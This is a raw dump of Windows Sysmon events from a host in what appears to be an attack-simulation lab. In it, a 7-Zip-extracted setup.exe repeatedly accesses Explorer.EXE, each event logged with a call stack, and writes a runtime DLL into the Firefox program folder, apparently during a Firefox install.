windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll2021-01-18 13:59:52.192 10341000x800000000000000014438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
